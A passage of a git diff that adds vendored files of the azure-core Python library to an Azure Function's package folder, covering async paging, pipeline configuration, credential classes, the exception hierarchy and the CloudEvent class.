collections.abc.Iterable): + self._current_page = AsyncList(self._current_page) + + return self._current_page + + +class AsyncItemPaged(AsyncIterator[ReturnType]): + def __init__(self, *args, **kwargs) -> None: + """Return an async iterator of items. + + args and kwargs will be passed to the AsyncPageIterator constructor directly, + except page_iterator_class + """ + self._args = args + self._kwargs = kwargs + self._page_iterator = ( + None + ) # type: Optional[AsyncIterator[AsyncIterator[ReturnType]]] + self._page = None # type: Optional[AsyncIterator[ReturnType]] + self._page_iterator_class = self._kwargs.pop( + "page_iterator_class", AsyncPageIterator + ) + + def by_page( + self, + continuation_token: Optional[str] = None, + ) -> AsyncIterator[AsyncIterator[ReturnType]]: + """Get an async iterator of pages of objects, instead of an async iterator of objects. + + :param str continuation_token: + An opaque continuation token. This value can be retrieved from the + continuation_token field of a previous generator object. If specified, + this generator will begin returning results from this point. + :returns: An async iterator of pages (themselves async iterator of objects) + """ + return self._page_iterator_class( + *self._args, **self._kwargs, continuation_token=continuation_token + ) + + async def __anext__(self) -> ReturnType: + if self._page_iterator is None: + self._page_iterator = self.by_page() + return await self.__anext__() + if self._page is None: + # Let it raise StopAsyncIteration + self._page = await self._page_iterator.__anext__() + return await self.__anext__() + try: + return await self._page.__anext__() + except StopAsyncIteration: + self._page = None + return await self.__anext__() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/configuration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/configuration.py new file mode 100644 index 0000000..ebd06e1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/configuration.py @@ -0,0 +1,120 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + + +class Configuration(object): + """Provides the home for all of the configurable policies in the pipeline. + + A new Configuration object provides no default policies and does not specify in what + order the policies will be added to the pipeline. The SDK developer must specify each + of the policy defaults as required by the service and use the policies in the + Configuration to construct the pipeline correctly, as well as inserting any + unexposed/non-configurable policies. + + :ivar headers_policy: Provides parameters for custom or additional headers to be sent with the request. + :ivar proxy_policy: Provides configuration parameters for proxy. + :ivar redirect_policy: Provides configuration parameters for redirects. + :ivar retry_policy: Provides configuration parameters for retries in the pipeline. + :ivar custom_hook_policy: Provides configuration parameters for a custom hook. + :ivar logging_policy: Provides configuration parameters for logging. + :ivar http_logging_policy: Provides configuration parameters for HTTP specific logging. + :ivar user_agent_policy: Provides configuration parameters to append custom values to the + User-Agent header. + :ivar authentication_policy: Provides configuration parameters for adding a bearer token Authorization + header to requests. + :keyword polling_interval: Polling interval while doing LRO operations, if Retry-After is not set. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_config.py + :start-after: [START configuration] + :end-before: [END configuration] + :language: python + :caption: Creates the service configuration and adds policies. + """ + + def __init__(self, **kwargs): + # Headers (sent with every request) + self.headers_policy = None + + # Proxy settings (Currently used to configure transport, could be pipeline policy instead) + self.proxy_policy = None + + # Redirect configuration + self.redirect_policy = None + + # Retry configuration + self.retry_policy = None + + # Custom hook configuration + self.custom_hook_policy = None + + # Logger configuration + self.logging_policy = None + + # Http logger configuration + self.http_logging_policy = None + + # User Agent configuration + self.user_agent_policy = None + + # Authentication configuration + self.authentication_policy = None + + # Polling interval if no retry-after in polling calls results + self.polling_interval = kwargs.get("polling_interval", 30) + + +class ConnectionConfiguration(object): + """HTTP transport connection configuration settings. + + Common properties that can be configured on all transports. Found in the + Configuration object. + + :keyword int connection_timeout: A single float in seconds for the connection timeout. Defaults to 300 seconds. + :keyword int read_timeout: A single float in seconds for the read timeout. Defaults to 300 seconds. + :keyword bool connection_verify: SSL certificate verification. Enabled by default. Set to False to disable, + alternatively can be set to the path to a CA_BUNDLE file or directory with certificates of trusted CAs. + :keyword str connection_cert: Client-side certificates. You can specify a local cert to use as client side + certificate, as a single file (containing the private key and the certificate) or as a tuple of both files' paths. + :keyword int connection_data_block_size: The block size of data sent over the connection. Defaults to 4096 bytes. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_config.py + :start-after: [START connection_configuration] + :end-before: [END connection_configuration] + :language: python + :dedent: 4 + :caption: Configuring transport connection settings. + """ + + def __init__(self, **kwargs): + self.timeout = kwargs.pop('connection_timeout', 300) + self.read_timeout = kwargs.pop('read_timeout', 300) + self.verify = kwargs.pop('connection_verify', True) + self.cert = kwargs.pop('connection_cert', None) + self.data_block_size = kwargs.pop('connection_data_block_size', 4096) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials.py new file mode 100644 index 0000000..79dc373 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials.py @@ -0,0 +1,163 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +from collections import namedtuple +from typing import Any, NamedTuple, Optional +from typing_extensions import Protocol +import six + + +class AccessToken(NamedTuple): + """Represents an OAuth access token.""" + + token: str + expires_on: int + +AccessToken.token.__doc__ = """The token string.""" +AccessToken.expires_on.__doc__ = """The token's expiration time in Unix time.""" + + +class TokenCredential(Protocol): + """Protocol for classes able to provide OAuth tokens.""" + + def get_token( + self, *scopes: str, claims: Optional[str] = None, tenant_id: Optional[str] = None, **kwargs: Any + ) -> AccessToken: + """Request an access token for `scopes`. + + :param str scopes: The type of access needed. + + :keyword str claims: Additional claims required in the token, such as those returned in a resource + provider's claims challenge following an authorization failure. + :keyword str tenant_id: Optional tenant to include in the token request. + + :rtype: AccessToken + :return: An AccessToken instance containing the token string and its expiration time in Unix time. + """ + + +AzureNamedKey = namedtuple("AzureNamedKey", ["name", "key"]) + + +__all__ = ["AzureKeyCredential", "AzureSasCredential", "AccessToken", "AzureNamedKeyCredential", "TokenCredential"] + + +class AzureKeyCredential(object): + """Credential type used for authenticating to an Azure service. + It provides the ability to update the key without creating a new client. + + :param str key: The key used to authenticate to an Azure service + :raises: TypeError + """ + + def __init__(self, key): + # type: (str) -> None + if not isinstance(key, six.string_types): + raise TypeError("key must be a string.") + self._key = key # type: str + + @property + def key(self): + # type () -> str + """The value of the configured key. + + :rtype: str + """ + return self._key + + def update(self, key): + # type: (str) -> None + """Update the key. + + This can be used when you've regenerated your service key and want + to update long-lived clients. + + :param str key: The key used to authenticate to an Azure service + :raises: ValueError or TypeError + """ + if not key: + raise ValueError("The key used for updating can not be None or empty") + if not isinstance(key, six.string_types): + raise TypeError("The key used for updating must be a string.") + self._key = key + + +class AzureSasCredential(object): + """Credential type used for authenticating to an Azure service. + It provides the ability to update the shared access signature without creating a new client. + + :param str signature: The shared access signature used to authenticate to an Azure service + :raises: TypeError + """ + + def __init__(self, signature): + # type: (str) -> None + if not isinstance(signature, six.string_types): + raise TypeError("signature must be a string.") + self._signature = signature # type: str + + @property + def signature(self): + # type () -> str + """The value of the configured shared access signature. + + :rtype: str + """ + return self._signature + + def update(self, signature): + # type: (str) -> None + """Update the shared access signature. + + This can be used when you've regenerated your shared access signature and want + to update long-lived clients. + + :param str signature: The shared access signature used to authenticate to an Azure service + :raises: ValueError or TypeError + """ + if not signature: + raise ValueError("The signature used for updating can not be None or empty") + if not isinstance(signature, six.string_types): + raise TypeError("The signature used for updating must be a string.") + self._signature = signature + + +class AzureNamedKeyCredential(object): + """Credential type used for working with any service needing a named key that follows patterns + established by the other credential types. + + :param str name: The name of the credential used to authenticate to an Azure service. + :param str key: The key used to authenticate to an Azure service. + :raises: TypeError + """ + + def __init__(self, name, key): + # type: (str, str) -> None + if not isinstance(name, six.string_types) or not isinstance(key, six.string_types): + raise TypeError("Both name and key must be strings.") + self._credential = AzureNamedKey(name, key) + + @property + def named_key(self): + # type () -> AzureNamedKey + """The value of the configured name. + + :rtype: AzureNamedKey + """ + return self._credential + + def update(self, name, key): + # type: (str, str) -> None + """Update the named key credential. + + Both name and key must be provided in order to update the named key credential. + Individual attributes cannot be updated. + + :param str name: The name of the credential used to authenticate to an Azure service. + :param str key: The key used to authenticate to an Azure service. + """ + if not isinstance(name, six.string_types) or not isinstance(key, six.string_types): + raise TypeError("Both name and key must be strings.") + self._credential = AzureNamedKey(name, key) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials_async.py new file mode 100644 index 0000000..9c83170 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/credentials_async.py @@ -0,0 +1,34 @@ +# ------------------------------------ +# Copyright (c) Microsoft Corporation. +# Licensed under the MIT License. +# ------------------------------------ +from typing import Any, Optional +from typing_extensions import Protocol +from .credentials import AccessToken as _AccessToken + +class AsyncTokenCredential(Protocol): + """Protocol for classes able to provide OAuth tokens.""" + + async def get_token( + self, *scopes: str, claims: Optional[str] = None, tenant_id: Optional[str] = None, **kwargs: Any + ) -> _AccessToken: + """Request an access token for `scopes`. + + :param str scopes: The type of access needed. + + :keyword str claims: Additional claims required in the token, such as those returned in a resource + provider's claims challenge following an authorization failure. + :keyword str tenant_id: Optional tenant to include in the token request. + + :rtype: AccessToken + :return: An AccessToken instance containing the token string and its expiration time in Unix time. + """ + + async def close(self) -> None: + pass + + async def __aenter__(self): + pass + + async def __aexit__(self, exc_type, exc_value, traceback) -> None: + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/exceptions.py new file mode 100644 index 0000000..ec96e74 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/exceptions.py @@ -0,0 +1,506 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import json +import logging +import sys + +from typing import Callable, Any, Dict, Optional, List, Union, Type, TYPE_CHECKING + +_LOGGER = logging.getLogger(__name__) + +if TYPE_CHECKING: + from azure.core.pipeline.transport._base import _HttpResponseBase + + +__all__ = [ + "AzureError", + "ServiceRequestError", + "ServiceResponseError", + "HttpResponseError", + "DecodeError", + "ResourceExistsError", + "ResourceNotFoundError", + "ClientAuthenticationError", + "ResourceModifiedError", + "ResourceNotModifiedError", + "TooManyRedirectsError", + "ODataV4Format", + "ODataV4Error", + "StreamConsumedError", + "StreamClosedError", + "ResponseNotReadError", + "SerializationError", + "DeserializationError", +] + + +def raise_with_traceback(exception, *args, **kwargs): + # type: (Callable, Any, Any) -> None + """Raise exception with a specified traceback. + This MUST be called inside a "except" clause. + + :param Exception exception: Error type to be raised. + :param args: Any additional args to be included with exception. + :keyword str message: Message to be associated with the exception. If omitted, defaults to an empty string. + """ + message = kwargs.pop("message", "") + exc_type, exc_value, exc_traceback = sys.exc_info() + # If not called inside a "except", exc_type will be None. Assume it will not happen + if exc_type is None: + raise ValueError("raise_with_traceback can only be used in except clauses") + exc_msg = "{}, {}: {}".format(message, exc_type.__name__, exc_value) + error = exception(exc_msg, *args, **kwargs) + try: + raise error.with_traceback(exc_traceback) + except AttributeError: + error.__traceback__ = exc_traceback + raise error + +class ErrorMap(object): + """Error Map class. To be used in map_error method, behaves like a dictionary. + It returns the error type if it is found in custom_error_map. Or return default_error + + :param dict custom_error_map: User-defined error map, it is used to map status codes to error types. + :keyword error default_error: Default error type. It is returned if the status code is not found in custom_error_map + """ + def __init__(self, custom_error_map=None, **kwargs): + self._custom_error_map = custom_error_map or {} + self._default_error = kwargs.pop("default_error", None) + + def get(self, key): + ret = self._custom_error_map.get(key) + if ret: + return ret + return self._default_error + +def map_error(status_code, response, error_map): + if not error_map: + return + error_type = error_map.get(status_code) + if not error_type: + return + error = error_type(response=response) + raise error + + +class ODataV4Format(object): + """Class to describe OData V4 error format. + + http://docs.oasis-open.org/odata/odata-json-format/v4.0/os/odata-json-format-v4.0-os.html#_Toc372793091 + + Example of JSON: + + error: { + "code": "ValidationError", + "message": "One or more fields contain incorrect values: ", + "details": [ + { + "code": "ValidationError", + "target": "representation", + "message": "Parsing error(s): String '' does not match regex pattern '^[^{}/ :]+(?: :\\\\d+)?$'. + Path 'host', line 1, position 297." + }, + { + "code": "ValidationError", + "target": "representation", + "message": "Parsing error(s): The input OpenAPI file is not valid for the OpenAPI specificate + https: //github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md + (schema https://github.com/OAI/OpenAPI-Specification/blob/master/schemas/v2.0/schema.json)." + } + ] + } + + :param dict json_object: A Python dict representing a ODataV4 JSON + :ivar str ~.code: Its value is a service-defined error code. + This code serves as a sub-status for the HTTP error code specified in the response. + :ivar str message: Human-readable, language-dependent representation of the error. + :ivar str target: The target of the particular error (for example, the name of the property in error). + This field is optional and may be None. + :ivar list[ODataV4Format] details: Array of ODataV4Format instances that MUST contain name/value pairs + for code and message, and MAY contain a name/value pair for target, as described above. + :ivar dict innererror: An object. The contents of this object are service-defined. + Usually this object contains information that will help debug the service. + """ + CODE_LABEL = "code" + MESSAGE_LABEL = "message" + TARGET_LABEL = "target" + DETAILS_LABEL = "details" + INNERERROR_LABEL = "innererror" + + def __init__(self, json_object): + if "error" in json_object: + json_object = json_object["error"] + cls = self.__class__ # type: Type[ODataV4Format] + + # Required fields, but assume they could be missing still to be robust + self.code = json_object.get(cls.CODE_LABEL) # type: Optional[str] + self.message = json_object.get(cls.MESSAGE_LABEL) # type: Optional[str] + + if not (self.code or self.message): + raise ValueError("Impossible to extract code/message from received JSON:\n"+json.dumps(json_object)) + + # Optional fields + self.target = json_object.get(cls.TARGET_LABEL) # type: Optional[str] + + # details is recursive of this very format + self.details = [] # type: List[ODataV4Format] + for detail_node in json_object.get(cls.DETAILS_LABEL) or []: + try: + self.details.append(self.__class__(detail_node)) + except Exception: # pylint: disable=broad-except + pass + + self.innererror = json_object.get(cls.INNERERROR_LABEL, {}) # type: Dict[str, Any] + + @property + def error(self): + import warnings + + warnings.warn( + "error.error from azure exceptions is deprecated, just simply use 'error' once", + DeprecationWarning, + ) + return self + + def __str__(self): + return "({}) {}\n{}".format( + self.code, + self.message, + self.message_details() + ) + + def message_details(self): + """Return a detailled string of the error. + """ + # () -> str + error_str = "Code: {}".format(self.code) + error_str += "\nMessage: {}".format(self.message) + if self.target: + error_str += "\nTarget: {}".format(self.target) + + if self.details: + error_str += "\nException Details:" + for error_obj in self.details: + # Indent for visibility + error_str += "\n".join("\t" + s for s in str(error_obj).splitlines()) + + if self.innererror: + error_str += "\nInner error: {}".format( + json.dumps(self.innererror, indent=4) + ) + return error_str + + +class AzureError(Exception): + """Base exception for all errors. + + :param message: The message object stringified as 'message' attribute + :keyword error: The original exception if any + :paramtype error: Exception + + :ivar inner_exception: The exception passed with the 'error' kwarg + :vartype inner_exception: Exception + :ivar exc_type: The exc_type from sys.exc_info() + :ivar exc_value: The exc_value from sys.exc_info() + :ivar exc_traceback: The exc_traceback from sys.exc_info() + :ivar exc_msg: A string formatting of message parameter, exc_type and exc_value + :ivar str message: A stringified version of the message parameter + :ivar str continuation_token: A token reference to continue an incomplete operation. This value is optional + and will be `None` where continuation is either unavailable or not applicable. + """ + + def __init__(self, message, *args, **kwargs): + self.inner_exception = kwargs.get("error") + self.exc_type, self.exc_value, self.exc_traceback = sys.exc_info() + self.exc_type = ( + self.exc_type.__name__ if self.exc_type else type(self.inner_exception) + ) + self.exc_msg = "{}, {}: {}".format(message, self.exc_type, self.exc_value) + self.message = str(message) + self.continuation_token = kwargs.get('continuation_token') + super(AzureError, self).__init__(self.message, *args) + + def raise_with_traceback(self): + try: + raise super(AzureError, self).with_traceback(self.exc_traceback) + except AttributeError: + self.__traceback__ = self.exc_traceback + raise self + + +class ServiceRequestError(AzureError): + """An error occurred while attempt to make a request to the service. + No request was sent. + """ + + +class ServiceResponseError(AzureError): + """The request was sent, but the client failed to understand the response. + The connection may have timed out. These errors can be retried for idempotent or + safe operations""" + +class ServiceRequestTimeoutError(ServiceRequestError): + """Error raised when timeout happens""" + +class ServiceResponseTimeoutError(ServiceResponseError): + """Error raised when timeout happens""" + +class HttpResponseError(AzureError): + """A request was made, and a non-success status code was received from the service. + + :param message: HttpResponse's error message + :type message: string + :param response: The response that triggered the exception. + :type response: ~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse + + :ivar reason: The HTTP response reason + :vartype reason: str + :ivar status_code: HttpResponse's status code + :vartype status_code: int + :ivar response: The response that triggered the exception. + :vartype response: ~azure.core.pipeline.transport.HttpResponse or ~azure.core.pipeline.transport.AsyncHttpResponse + :ivar model: The request body/response body model + :vartype model: ~msrest.serialization.Model + :ivar error: The formatted error + :vartype error: ODataV4Format + """ + + def __init__(self, message=None, response=None, **kwargs): + # Don't want to document this one yet. + error_format = kwargs.get("error_format", ODataV4Format) + + self.reason = None + self.status_code = None + self.response = response + if response: + self.reason = response.reason + self.status_code = response.status_code + + # old autorest are setting "error" before calling __init__, so it might be there already + # transferring into self.model + model = kwargs.pop("model", None) # type: Optional[msrest.serialization.Model] + if model is not None: # autorest v5 + self.model = model + else: # autorest azure-core, for KV 1.0, Storage 12.0, etc. + self.model = getattr( + self, "error", None + ) # type: Optional[msrest.serialization.Model] + self.error = self._parse_odata_body(error_format, response) # type: Optional[ODataV4Format] + + # By priority, message is: + # - odatav4 message, OR + # - parameter "message", OR + # - generic meassage using "reason" + if self.error: + message = str(self.error) + else: + message = message or "Operation returned an invalid status '{}'".format( + self.reason + ) + + super(HttpResponseError, self).__init__(message=message, **kwargs) + + @staticmethod + def _parse_odata_body(error_format, response): + # type: (Type[ODataV4Format], _HttpResponseBase) -> Optional[ODataV4Format] + try: + odata_json = json.loads(response.text()) + return error_format(odata_json) + except Exception: # pylint: disable=broad-except + # If the body is not JSON valid, just stop now + pass + return None + + def __str__(self): + retval = super(HttpResponseError, self).__str__() + try: + body = self.response.text() + if body and not self.error: + return "{}\nContent: {}".format(retval, body)[:2048] + except Exception: # pylint: disable=broad-except + pass + return retval + + +class DecodeError(HttpResponseError): + """Error raised during response deserialization.""" + + +class IncompleteReadError(DecodeError): + """Error raised if peer closes the connection before we have received the complete message body.""" + + +class ResourceExistsError(HttpResponseError): + """An error response with status code 4xx. + This will not be raised directly by the Azure core pipeline.""" + + +class ResourceNotFoundError(HttpResponseError): + """ An error response, typically triggered by a 412 response (for update) or 404 (for get/post) + """ + + +class ClientAuthenticationError(HttpResponseError): + """An error response with status code 4xx. + This will not be raised directly by the Azure core pipeline.""" + + +class ResourceModifiedError(HttpResponseError): + """An error response with status code 4xx, typically 412 Conflict. + This will not be raised directly by the Azure core pipeline.""" + + +class ResourceNotModifiedError(HttpResponseError): + """An error response with status code 304. + This will not be raised directly by the Azure core pipeline.""" + + +class TooManyRedirectsError(HttpResponseError): + """Reached the maximum number of redirect attempts.""" + + def __init__(self, history, *args, **kwargs): + self.history = history + message = "Reached maximum redirect attempts." + super(TooManyRedirectsError, self).__init__(message, *args, **kwargs) + + +class ODataV4Error(HttpResponseError): + """An HTTP response error where the JSON is decoded as OData V4 error format. + + http://docs.oasis-open.org/odata/odata-json-format/v4.0/os/odata-json-format-v4.0-os.html#_Toc372793091 + + :ivar dict odata_json: The parsed JSON body as attribute for convenience. + :ivar str ~.code: Its value is a service-defined error code. + This code serves as a sub-status for the HTTP error code specified in the response. + :ivar str message: Human-readable, language-dependent representation of the error. + :ivar str target: The target of the particular error (for example, the name of the property in error). + This field is optional and may be None. + :ivar list[ODataV4Format] details: Array of ODataV4Format instances that MUST contain name/value pairs + for code and message, and MAY contain a name/value pair for target, as described above. + :ivar dict innererror: An object. The contents of this object are service-defined. + Usually this object contains information that will help debug the service. + """ + + _ERROR_FORMAT = ODataV4Format + + def __init__(self, response, **kwargs): + # type: (_HttpResponseBase, Any) -> None + + # Ensure field are declared, whatever can happen afterwards + self.odata_json = None # type: Optional[Dict[str, Any]] + try: + self.odata_json = json.loads(response.text()) + odata_message = self.odata_json.setdefault("error", {}).get("message") + except Exception: # pylint: disable=broad-except + # If the body is not JSON valid, just stop now + odata_message = None + + self.code = None # type: Optional[str] + self.message = kwargs.get("message", odata_message) # type: Optional[str] + self.target = None # type: Optional[str] + self.details = [] # type: Optional[List[Any]] + self.innererror = {} # type: Optional[Dict[str, Any]] + + if self.message and "message" not in kwargs: + kwargs["message"] = self.message + + super(ODataV4Error, self).__init__(response=response, **kwargs) + + self._error_format = None # type: Optional[Union[str, ODataV4Format]] + if self.odata_json: + try: + error_node = self.odata_json["error"] + self._error_format = self._ERROR_FORMAT(error_node) + self.__dict__.update( + { + k: v + for k, v in self._error_format.__dict__.items() + if v is not None + } + ) + except Exception: # pylint: disable=broad-except + _LOGGER.info("Received error message was not valid OdataV4 format.") + self._error_format = "JSON was invalid for format " + str( + self._ERROR_FORMAT + ) + + def __str__(self): + if self._error_format: + return str(self._error_format) + return super(ODataV4Error, self).__str__() + +class StreamConsumedError(AzureError): + """Error thrown if you try to access the stream of a response once consumed. + + It is thrown if you try to read / stream an ~azure.core.rest.HttpResponse or + ~azure.core.rest.AsyncHttpResponse once the response's stream has been consumed. + """ + def __init__(self, response): + message = ( + "You are attempting to read or stream the content from request {}. "\ + "You have likely already consumed this stream, so it can not be accessed anymore.".format( + response.request + ) + ) + super(StreamConsumedError, self).__init__(message) + +class StreamClosedError(AzureError): + """Error thrown if you try to access the stream of a response once closed. + + It is thrown if you try to read / stream an ~azure.core.rest.HttpResponse or + ~azure.core.rest.AsyncHttpResponse once the response's stream has been closed. + """ + def __init__(self, response): + message = ( + "The content for response from request {} can no longer be read or streamed, since the "\ + "response has already been closed.".format(response.request) + ) + super(StreamClosedError, self).__init__(message) + +class ResponseNotReadError(AzureError): + """Error thrown if you try to access a response's content without reading first. + + It is thrown if you try to access an ~azure.core.rest.HttpResponse or + ~azure.core.rest.AsyncHttpResponse's content without first reading the response's bytes in first. + """ + + def __init__(self, response): + message = ( + "You have not read in the bytes for the response from request {}. "\ + "Call .read() on the response first.".format( + response.request + ) + ) + super(ResponseNotReadError, self).__init__(message) + +class SerializationError(ValueError): + """Raised if an error is encountered during serialization.""" + ... + +class DeserializationError(ValueError): + """Raised if an error is encountered during deserialization.""" + ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/messaging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/messaging.py new file mode 100644 index 0000000..3c50739 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/messaging.py @@ -0,0 +1,198 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import uuid +from base64 import b64decode +from datetime import datetime +from .utils._utils import _convert_to_isoformat, TZ_UTC +from .utils._messaging_shared import _get_json_content +from .serialization import NULL + +try: + from typing import TYPE_CHECKING, cast, Union +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + from typing import Any, Optional, Dict + + +__all__ = ["CloudEvent"] + + +class CloudEvent(object): # pylint:disable=too-many-instance-attributes + """Properties of the CloudEvent 1.0 Schema. + All required parameters must be populated in order to send to Azure. + + :param source: Required. Identifies the context in which an event happened. The combination of id and source must + be unique for each distinct event. If publishing to a domain topic, source must be the domain name. + :type source: str + :param type: Required. Type of event related to the originating occurrence. + :type type: str + :keyword data: Optional. Event data specific to the event type. + :type data: object + :keyword time: Optional. The time (in UTC) the event was generated. + :type time: ~datetime.datetime + :keyword dataschema: Optional. Identifies the schema that data adheres to. + :type dataschema: str + :keyword datacontenttype: Optional. Content type of data value. + :type datacontenttype: str + :keyword subject: Optional. This describes the subject of the event in the context of the event producer + (identified by source). + :type subject: str + :keyword specversion: Optional. The version of the CloudEvent spec. Defaults to "1.0" + :type specversion: str + :keyword id: Optional. An identifier for the event. The combination of id and source must be + unique for each distinct event. If not provided, a random UUID will be generated and used. + :type id: Optional[str] + :keyword extensions: Optional. A CloudEvent MAY include any number of additional context attributes + with distinct names represented as key - value pairs. Each extension must be alphanumeric, lower cased + and must not exceed the length of 20 characters. + :type extensions: Optional[Dict] + :ivar source: Identifies the context in which an event happened. The combination of id and source must + be unique for each distinct event. If publishing to a domain topic, source must be the domain name. + :vartype source: str + :ivar data: Event data specific to the event type. + :vartype data: object + :ivar type: Type of event related to the originating occurrence. + :vartype type: str + :ivar time: The time (in UTC) the event was generated. + :vartype time: ~datetime.datetime + :ivar dataschema: Identifies the schema that data adheres to. + :vartype dataschema: str + :ivar datacontenttype: Content type of data value. + :vartype datacontenttype: str + :ivar subject: This describes the subject of the event in the context of the event producer + (identified by source). + :vartype subject: str + :ivar specversion: Optional. The version of the CloudEvent spec. Defaults to "1.0" + :vartype specversion: str + :ivar id: An identifier for the event. The combination of id and source must be + unique for each distinct event. If not provided, a random UUID will be generated and used. + :vartype id: str + :ivar extensions: A CloudEvent MAY include any number of additional context attributes + with distinct names represented as key - value pairs. Each extension must be alphanumeric, lower cased + and must not exceed the length of 20 characters. + :vartype extensions: Dict + """ + + def __init__(self, source, type, **kwargs): # pylint: disable=redefined-builtin + # type: (str, str, **Any) -> None + self.source = source # type: str + self.type = type # type: str + self.specversion = kwargs.pop("specversion", "1.0") # type: Optional[str] + self.id = kwargs.pop("id", str(uuid.uuid4())) # type: Optional[str] + self.time = kwargs.pop("time", datetime.now(TZ_UTC)) # type: Optional[datetime] + + self.datacontenttype = kwargs.pop("datacontenttype", None) # type: Optional[str] + self.dataschema = kwargs.pop("dataschema", None) # type: Optional[str] + self.subject = kwargs.pop("subject", None) # type: Optional[str] + self.data = kwargs.pop("data", None) # type: Optional[object] + + try: + self.extensions = kwargs.pop("extensions") # type: Optional[Dict] + for key in self.extensions.keys(): # type:ignore # extensions won't be None here + if not key.islower() or not key.isalnum(): + raise ValueError( + "Extension attributes should be lower cased and alphanumeric." + ) + except KeyError: + self.extensions = None + + if kwargs: + remaining = ", ".join(kwargs.keys()) + raise ValueError( + "Unexpected keyword arguments {}. Any extension attributes must be passed explicitly using extensions." + .format(remaining) + ) + + def __repr__(self): + return "CloudEvent(source={}, type={}, specversion={}, id={}, time={})".format( + self.source, self.type, self.specversion, self.id, self.time + )[:1024] + + @classmethod + def from_dict(cls, event): + # type: (Dict) -> CloudEvent + """ + Returns the deserialized CloudEvent object when a dict is provided. + :param event: The dict representation of the event which needs to be deserialized. + :type event: dict + :rtype: CloudEvent + """ + kwargs = {} # type: Dict[Any, Any] + reserved_attr = [ + "data", + "data_base64", + "id", + "source", + "type", + "specversion", + "time", + "dataschema", + "datacontenttype", + "subject", + ] + + if "data" in event and "data_base64" in event: + raise ValueError( + "Invalid input. Only one of data and data_base64 must be present." + ) + + if "data" in event: + data = event.get("data") + kwargs["data"] = data if data is not None else NULL + elif "data_base64" in event: + kwargs["data"] = b64decode( + cast(Union[str, bytes], event.get("data_base64")) + ) + + for item in ["datacontenttype", "dataschema", "subject"]: + if item in event: + val = event.get(item) + kwargs[item] = val if val is not None else NULL + + extensions = {k: v for k, v in event.items() if k not in reserved_attr} + if extensions: + kwargs["extensions"] = extensions + + try: + event_obj = cls( + id=event.get("id"), + source=event["source"], + type=event["type"], + specversion=event.get("specversion"), + time=_convert_to_isoformat(event.get("time")), + **kwargs + ) + except KeyError: + # https://github.com/cloudevents/spec Cloud event spec requires source, type, + # specversion. We autopopulate everything other than source, type. + if not all([_ in event for _ in ("source", "type")]): + if all([_ in event for _ in 